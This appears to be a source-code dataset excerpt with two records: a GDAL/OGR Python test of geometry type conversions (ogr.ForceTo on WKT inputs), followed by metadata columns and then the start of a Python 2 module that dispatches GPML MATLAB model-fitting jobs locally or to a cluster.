('LINESTRING(2 5,10 20)', 'COMPOUNDCURVE ((2 5,10 20))', ogr.wkbCompoundCurve ),
('LINESTRING(2 5,10 20)', 'MULTILINESTRING ((2 5,10 20))', ogr.wkbMultiLineString ),
('LINESTRING(2 5,10 20)', 'MULTICURVE ((2 5,10 20))', ogr.wkbMultiCurve ),
('LINESTRING(2 5,10 20)', None, ogr.wkbPolygon ),
('LINESTRING(2 5,10 20)', None, ogr.wkbCurvePolygon ),
('LINESTRING(2 5,10 20)', None, ogr.wkbMultiSurface ),
('LINESTRING(2 5,10 20)', None, ogr.wkbMultiPolygon ),
('LINESTRING(0 0,0 1,1 1,0 0)', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('LINESTRING(0 0,0 1,1 1,0 0)', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('LINESTRING(0 0,0 1,1 1,0 0)', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('LINESTRING(0 0,0 1,1 1,0 0)', 'MULTISURFACE (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('LINESTRING EMPTY', 'COMPOUNDCURVE EMPTY', ogr.wkbCompoundCurve ),
('LINESTRING EMPTY', 'MULTILINESTRING EMPTY', ogr.wkbMultiLineString ),
('LINESTRING EMPTY', 'MULTICURVE EMPTY', ogr.wkbMultiCurve ),
('MULTILINESTRING ((2 5,10 20))', 'LINESTRING(2 5,10 20)', ogr.wkbLineString ),
('MULTILINESTRING ((2 5,10 20))', 'COMPOUNDCURVE ((2 5,10 20))', ogr.wkbCompoundCurve ),
('MULTILINESTRING ((2 5,10 20))', 'MULTICURVE ((2 5,10 20))', ogr.wkbMultiCurve ),
('MULTILINESTRING ((2 5,10 20))', None, ogr.wkbPolygon ),
('MULTILINESTRING ((2 5,10 20))', None, ogr.wkbCurvePolygon ),
('MULTILINESTRING ((2 5,10 20))', None, ogr.wkbMultiPolygon ),
('MULTILINESTRING ((2 5,10 20))', None, ogr.wkbMultiSurface ),
('MULTILINESTRING ((0 0,0 1,1 1,0 0))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('MULTILINESTRING ((0 0,0 1,1 1,0 0))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('MULTILINESTRING ((0 0,0 1,1 1,0 0))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('MULTILINESTRING ((0 0,0 1,1 1,0 0))', 'MULTISURFACE (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('MULTILINESTRING EMPTY', 'LINESTRING EMPTY', ogr.wkbLineString ),
('MULTILINESTRING EMPTY', 'COMPOUNDCURVE EMPTY', ogr.wkbCompoundCurve ),
('MULTILINESTRING EMPTY', 'MULTICURVE EMPTY', ogr.wkbMultiCurve ),
('CIRCULARSTRING(0 0,1 0,0 0)', 'COMPOUNDCURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbCompoundCurve),
('CIRCULARSTRING(0 0,1 0,0 0)', 'MULTICURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbMultiCurve),
('CIRCULARSTRING(0 0,1 0,0 0)', 'CURVEPOLYGON (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbCurvePolygon),
('CIRCULARSTRING(0 0,1 0,0 0)', 'POLYGON ((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0))', ogr.wkbPolygon),
('CIRCULARSTRING(0 0,1 0,0 0)', 'MULTIPOLYGON (((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0)))', ogr.wkbMultiPolygon),
('CIRCULARSTRING(0 0,1 0,0 0)', 'MULTISURFACE (CURVEPOLYGON (CIRCULARSTRING (0 0,1 0,0 0)))', ogr.wkbMultiSurface),
('CIRCULARSTRING(0 0,1 0,0 0)', 'LINESTRING (0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0)', ogr.wkbLineString),
('CIRCULARSTRING(0 0,1 1,2 2)', 'LINESTRING (0 0,1 1,2 2)', ogr.wkbLineString),
('CIRCULARSTRING(0 0,1 1,2 2)', 'MULTILINESTRING ((0 0,1 1,2 2))', ogr.wkbMultiLineString),
('CIRCULARSTRING(0 0,1 1,2 2)', None, ogr.wkbPolygon),
('CIRCULARSTRING(0 0,1 1,2 2)', None, ogr.wkbCurvePolygon),
('CIRCULARSTRING(0 0,1 1,2 2)', None, ogr.wkbMultiSurface),
('CIRCULARSTRING(0 0,1 1,2 2)', None, ogr.wkbMultiPolygon),
('COMPOUNDCURVE ((2 5,10 20))', 'LINESTRING(2 5,10 20)', ogr.wkbLineString ),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 1,2 2))', 'LINESTRING (0 0,1 1,2 2)', ogr.wkbLineString ),
('COMPOUNDCURVE ((2 5,10 20),(10 20,30 40))', 'LINESTRING(2 5,10 20,30 40)', ogr.wkbLineString ),
('COMPOUNDCURVE ((2 5,10 20),(10 20,30 40))', 'MULTILINESTRING((2 5,10 20,30 40))', ogr.wkbMultiLineString ),
('COMPOUNDCURVE ((2 5,10 20),(10 20,30 40))', 'MULTICURVE (COMPOUNDCURVE ((2 5,10 20),(10 20,30 40)))', ogr.wkbMultiCurve ),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))', 'CURVEPOLYGON (COMPOUNDCURVE (CIRCULARSTRING (0 0,1 0,0 0)))', ogr.wkbCurvePolygon),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))', 'POLYGON ((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0))', ogr.wkbPolygon),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTISURFACE (CURVEPOLYGON (COMPOUNDCURVE (CIRCULARSTRING (0 0,1 0,0 0))))', ogr.wkbMultiSurface),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTIPOLYGON (((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0)))', ogr.wkbMultiPolygon),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))', 'LINESTRING (0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0)', ogr.wkbLineString),
('COMPOUNDCURVE((0 0,0 1,1 1,0 0))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('COMPOUNDCURVE((0 0,0 1,1 1,0 0))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('COMPOUNDCURVE((0 0,0 1,1 1,0 0))', 'MULTISURFACE (CURVEPOLYGON (COMPOUNDCURVE ((0 0,0 1,1 1,0 0))))', ogr.wkbMultiSurface ),
('COMPOUNDCURVE((0 0,0 1,1 1,0 0))', 'CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', ogr.wkbCurvePolygon ),
('POLYGON ((0 0,0 1,1 1,0 0))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('POLYGON ((0 0,0 1,1 1,0 0))', 'MULTISURFACE (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('POLYGON ((0 0,0 1,1 1,0 0))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('POLYGON ((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25))', ogr.wkbCurvePolygon ),
('POLYGON ((0 0,0 1,1 1,0 0))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('POLYGON ((0 0,0 1,1 1,0 0))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'MULTILINESTRING ((0 0,0 1,1 1,0 0))', ogr.wkbMultiLineString ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'MULTICURVE ((0 0,0 1,1 1,0 0))', ogr.wkbMultiCurve ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'MULTISURFACE (CURVEPOLYGON (COMPOUNDCURVE ((0 0,0 1,1 1,0 0))))', ogr.wkbMultiSurface ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', ogr.wkbCurvePolygon ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1),(0 1,1 1,0 0)))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'POLYGON ((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0))', ogr.wkbPolygon),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTISURFACE (CURVEPOLYGON ( CIRCULARSTRING (0 0,1 0,0 0)))', ogr.wkbMultiSurface),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTIPOLYGON (((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0)))', ogr.wkbMultiPolygon),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'COMPOUNDCURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbCompoundCurve),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTICURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbMultiCurve),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTILINESTRING ((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0))', ogr.wkbMultiLineString),
('MULTICURVE ((2 5,10 20))', 'LINESTRING(2 5,10 20)', ogr.wkbLineString ),
('MULTICURVE ((2 5,10 20))', 'COMPOUNDCURVE ((2 5,10 20))', ogr.wkbCompoundCurve ),
('MULTICURVE ((2 5,10 20))', 'MULTILINESTRING ((2 5,10 20))', ogr.wkbMultiLineString ),
('MULTICURVE (COMPOUNDCURVE((2 5,10 20)))', 'LINESTRING(2 5,10 20)', ogr.wkbLineString ),
('MULTICURVE (COMPOUNDCURVE((2 5,10 20)))', 'COMPOUNDCURVE ((2 5,10 20))', ogr.wkbCompoundCurve ),
('MULTICURVE (COMPOUNDCURVE((2 5,10 20)))', 'MULTILINESTRING ((2 5,10 20))', ogr.wkbMultiLineString ),
('MULTICURVE ((0 0,0 1,1 1,0 0))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('MULTICURVE ((0 0,0 1,1 1,0 0))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('MULTICURVE ((0 0,0 1,1 1,0 0))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('MULTICURVE ((0 0,0 1,1 1,0 0))', 'MULTISURFACE (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('MULTICURVE (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('MULTICURVE (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'MULTISURFACE (CURVEPOLYGON (COMPOUNDCURVE ((0 0,0 1,1 1,0 0))))', ogr.wkbMultiSurface ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbUnknown ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'MULTISURFACE (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25))', ogr.wkbCurvePolygon ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'MULTILINESTRING ((0 0,0 1,1 1,0 0))', ogr.wkbMultiLineString ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'MULTICURVE ((0 0,0 1,1 1,0 0))', ogr.wkbMultiCurve ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('MULTISURFACE (((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25))', ogr.wkbCurvePolygon ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'MULTILINESTRING ((0 0,0 1,1 1,0 0))', ogr.wkbMultiLineString ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'MULTICURVE ((0 0,0 1,1 1,0 0))', ogr.wkbMultiCurve ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25))', ogr.wkbCurvePolygon ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('MULTISURFACE (CURVEPOLYGON(CIRCULARSTRING(0 0,1 0,0 0)))', 'COMPOUNDCURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbCompoundCurve ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'MULTILINESTRING ((0 0,0 1,1 1,0 0))', ogr.wkbMultiLineString ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'MULTICURVE ((0 0,0 1,1 1,0 0))', ogr.wkbMultiCurve ),
('MULTISURFACE (CURVEPOLYGON(CIRCULARSTRING(0 0,1 0,0 0)))', 'MULTICURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbMultiCurve ),
('MULTIPOINT (2 5)', 'POINT(2 5)', ogr.wkbPoint ),
]
for (src_wkt, exp_wkt, target_type) in tests:
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
gdal.SetConfigOption('OGR_ARC_STEPSIZE', '45')
dst_geom = ogr.ForceTo( src_geom, target_type )
gdal.SetConfigOption('OGR_ARC_STEPSIZE', None)
if exp_wkt is None:
exp_wkt = src_wkt
elif target_type != ogr.wkbUnknown and dst_geom.GetGeometryType() != target_type:
gdaltest.post_reason('fail')
print(src_wkt)
print(target_type)
print(dst_geom.ExportToWkt())
return 'fail'
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
gdaltest.post_reason('fail')
print(src_wkt)
print(target_type)
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
gdaltest_list = [
ogr_factory_1,
ogr_factory_2,
ogr_factory_3,
ogr_factory_4,
ogr_factory_5,
ogr_factory_6,
ogr_factory_7,
ogr_factory_8,
]
if __name__ == '__main__':
gdaltest.setup_run( 'ogr_factory' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
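###############################################################################
# Illustrative sketch (not part of the original test file): the ForceTo()
# conversions exercised by ogr_factory_8 can also be used on their own.  The
# OGR_ARC_STEPSIZE configuration option controls how densely curve geometries
# are stroked, as the test itself sets it; the lines below use only the osgeo
# calls already imported above.
#
# src = ogr.CreateGeometryFromWkt('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))')
# gdal.SetConfigOption('OGR_ARC_STEPSIZE', '45')  # coarse stroking, as in the test
# dst = ogr.ForceTo(src, ogr.wkbMultiPolygon)     # curve ring is stroked into a polygon ring
# gdal.SetConfigOption('OGR_ARC_STEPSIZE', None)
# print(dst.ExportToWkt())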
| 52.916667
| 638
| 0.607102
| 4,545
| 32,385
| 4.240264
| 0.065567
| 0.063512
| 0.031133
| 0.029265
| 0.805729
| 0.779888
| 0.763699
| 0.738844
| 0.727947
| 0.696658
| 0
| 0.200814
| 0.218404
| 32,385
| 611
| 639
| 53.003273
| 0.560564
| 0.053636
| 0
| 0.421801
| 0
| 0.047393
| 0.476664
| 0.094385
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021327
| false
| 0
| 0.011848
| 0
| 0.120853
| 0.075829
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
409b002a1e32b64c87720f224933503f404d6aa6
| 12,616
|
py
|
Python
|
source/job_controller.py
|
OpenXAIProject/Relational-Automatic-Statistician
|
417425dc623126475595902d6e7ab6a7b685bc56
|
[
"Apache-2.0",
"MIT"
] | 22
|
2019-07-23T04:15:58.000Z
|
2021-10-06T00:42:38.000Z
|
source/job_controller.py
|
OpenXAIProject/Relational-Automatic-Statistician
|
417425dc623126475595902d6e7ab6a7b685bc56
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
source/job_controller.py
|
OpenXAIProject/Relational-Automatic-Statistician
|
417425dc623126475595902d6e7ab6a7b685bc56
|
[
"Apache-2.0",
"MIT"
] | 8
|
2019-07-23T05:56:42.000Z
|
2021-05-20T21:21:50.000Z
|
'''
Main file for dispatching jobs to a cluster, creates remote files, etc.
@authors: David Duvenaud (dkd23@cam.ac.uk)
James Robert Lloyd (jrl44@cam.ac.uk)
Roger Grosse (rgrosse@mit.edu)
Created Jan 2013
'''
import flexible_function as ff
from flexible_function import GPModel
import grammar
import gpml
import utils.latex
import utils.fear
try:
import config
except:
print '\n\nERROR : source/config.py not found\n\nPlease create it, following the example file as a guide\n\n'
raise Exception('No config')
from utils import gaussians, psd_matrices
import numpy as np
nax = np.newaxis
# import pylab
import scipy.io
import sys
import os
import tempfile
import subprocess
import time
import cblparallel
from cblparallel.util import mkstemp_safe
import re
import shutil
import random
def evaluate_models(models, X, y, verbose=True, iters=300, local_computation=False, zip_files=False, max_jobs=500, random_seed=0, subset=False, subset_size=250, full_iters=0, bundle_size=1):
# Make data into matrices in case they're unidimensional.
if X.ndim == 1: X = X[:, nax]
if y.ndim == 1: y = y[:, nax]
ndata = y.shape[0]
# Create data file
if verbose:
print 'Creating data file locally'
data_file = cblparallel.create_temp_file('.mat')
scipy.io.savemat(data_file, {'X': X, 'y': y})
# Move to fear if necessary
if not local_computation:
if verbose:
print 'Moving data file to fear'
cblparallel.copy_to_remote(data_file)
# Create a list of MATLAB scripts to assess and optimise parameters for each kernel
if verbose:
print 'Creating scripts'
scripts = [None] * len(models)
for (i, model) in enumerate(models):
parameters = {'datafile': data_file.split('/')[-1],
'writefile': '%(output_file)s', # N.B. cblparallel manages output files
'gpml_path': cblparallel.gpml_path(local_computation),
'mean_syntax': model.mean.get_gpml_expression(dimensions=X.shape[1]),
'mean_params': '[ %s ]' % ' '.join(str(p) for p in model.mean.param_vector),
'kernel_syntax': model.kernel.get_gpml_expression(dimensions=X.shape[1]),
'kernel_params': '[ %s ]' % ' '.join(str(p) for p in model.kernel.param_vector),
'lik_syntax': model.likelihood.get_gpml_expression(dimensions=X.shape[1]),
'lik_params': '[ %s ]' % ' '.join(str(p) for p in model.likelihood.param_vector),
'inference': model.likelihood.gpml_inference_method,
'iters': str(iters),
'seed': str(np.random.randint(2**31)),
'subset': 'true' if subset else 'false',
'subset_size' : str(subset_size),
'full_iters' : str(full_iters)}
scripts[i] = gpml.OPTIMIZE_KERNEL_CODE % parameters
#### Need to be careful with % signs
#### For the moment, cblparallel expects no single % signs - FIXME
scripts[i] = re.sub('% ', '%% ', scripts[i])
# Send to cblparallel and save output_files
if verbose:
print 'Sending scripts to cblparallel'
if local_computation:
output_files = cblparallel.run_batch_locally(scripts, language='matlab', max_cpu=1.1, job_check_sleep=5, submit_sleep=0.1, max_running_jobs=10, verbose=verbose)
else:
output_files = cblparallel.run_batch_on_fear(scripts, language='matlab', max_jobs=max_jobs, verbose=verbose, zip_files=zip_files, bundle_size=bundle_size)
# Read in results
results = [None] * len(models)
for (i, output_file) in enumerate(output_files):
if verbose:
print 'Reading output file %d of %d' % (i + 1, len(models))
results[i] = GPModel.from_matlab_output(gpml.read_outputs(output_file), models[i], ndata)
# Tidy up local output files
for (i, output_file) in enumerate(output_files):
if verbose:
print 'Removing output file %d of %d' % (i + 1, len(models))
os.remove(output_file)
# Remove temporary data file (perhaps on the cluster server)
cblparallel.remove_temp_file(data_file, local_computation)
# Return results i.e. list of ScoredKernel objects
return results
def my_evaluate_models(models, X, y, verbose=True, iters=300, local_computation=False, zip_files=False, max_jobs=500, random_seed=0, subset=False, subset_size=250, full_iters=0, bundle_size=1):
# Make data into matrices in case they're unidimensional.
if X.ndim == 1: X = X[:, nax]
if y.ndim == 1: y = y[:, nax]
ndata = y.shape[0]
# Create data file
if verbose:
print 'Creating data file locally'
data_file = cblparallel.create_temp_file('.mat')
scipy.io.savemat(data_file, {'X': X, 'y': y})
# Move to fear if necessary
if not local_computation:
if verbose:
print 'Moving data file to fear'
cblparallel.copy_to_remote(data_file)
# Create a list of MATLAB scripts to assess and optimise parameters for each kernel
if verbose:
print 'Creating scripts'
scripts = [None] * len(models)
for (i, model) in enumerate(models):
parameters = {'datafile': data_file.split('/')[-1],
'writefile': '%(output_file)s', # N.B. cblparallel manages output files
'gpml_path': cblparallel.gpml_path(local_computation),
# 'mean_syntax': model.mean.get_gpml_expression(dimensions=X.shape[1]),
# 'mean_params': '[ %s ]' % ' '.join(str(p) for p in model.mean.param_vector),
'kernel_syntax': model.kernel.get_gpml_expression(dimensions=X.shape[1]),
'kernel_params': '[ %s ]' % ' '.join(str(p) for p in model.kernel.param_vector),
# 'lik_syntax': model.likelihood.get_gpml_expression(dimensions=X.shape[1]),
# 'lik_params': '[ %s ]' % ' '.join(str(p) for p in model.likelihood.param_vector),
# 'inference': model.likelihood.gpml_inference_method,
# 'iters': str(iters),
# 'seed': str(np.random.randint(2**31)),
# 'subset': 'true' if subset else 'false',
# 'subset_size' : str(subset_size),
# 'full_iters' : str(full_iters)
}
scripts[i] = gpml.MATLAB_SKL_CODE % parameters
#### Need to be careful with % signs
#### For the moment, cblparallel expects no single % signs - FIXME
scripts[i] = re.sub('% ', '%% ', scripts[i])
# Send to cblparallel and save output_files
if verbose:
print 'Sending scripts to cblparallel'
if local_computation:
output_files = cblparallel.run_batch_locally(scripts, language='matlab', max_cpu=1.1, job_check_sleep=5, submit_sleep=0.1, max_running_jobs=10, verbose=verbose)
else:
output_files = cblparallel.run_batch_on_fear(scripts, language='matlab', max_jobs=max_jobs, verbose=verbose, zip_files=zip_files, bundle_size=bundle_size)
# Read in results
results = [None] * len(models)
for (i, output_file) in enumerate(output_files):
if verbose:
print 'Reading output file %d of %d' % (i + 1, len(models))
results[i] = GPModel.my_from_matlab_output(gpml.my_read_outputs(output_file), models[i], ndata)
# Tidy up local output files
for (i, output_file) in enumerate(output_files):
if verbose:
print 'Removing output file %d of %d' % (i + 1, len(models))
os.remove(output_file)
# Remove temporary data file (perhaps on the cluster server)
cblparallel.remove_temp_file(data_file, local_computation)
# Return results i.e. list of ScoredKernel objects
return results
def make_predictions(X, y, Xtest, ytest, model, local_computation=False, max_jobs=500, verbose=True, random_seed=0, no_noise=False):
# Make data into matrices in case they're unidimensional.
if X.ndim == 1: X = X[:, nax]
if y.ndim == 1: y = y[:, nax]
ndata = y.shape[0]
# Save temporary data file in standard temporary directory
data_file = cblparallel.create_temp_file('.mat')
scipy.io.savemat(data_file, {'X': X, 'y': y, 'Xtest' : Xtest, 'ytest' : ytest})
# Copy onto cluster server if necessary
if not local_computation:
if verbose:
print 'Moving data file to fear'
cblparallel.copy_to_remote(data_file)
# Create prediction code
parameters ={'datafile': data_file.split('/')[-1],
'writefile': '%(output_file)s',
'gpml_path': cblparallel.gpml_path(local_computation),
'mean_syntax': model.mean.get_gpml_expression(dimensions=X.shape[1]),
'mean_params': '[ %s ]' % ' '.join(str(p) for p in model.mean.param_vector),
'kernel_syntax': model.kernel.get_gpml_expression(dimensions=X.shape[1]),
'kernel_params': '[ %s ]' % ' '.join(str(p) for p in model.kernel.param_vector),
'lik_syntax': model.likelihood.get_gpml_expression(dimensions=X.shape[1]),
'lik_params': '[ %s ]' % ' '.join(str(p) for p in model.likelihood.param_vector),
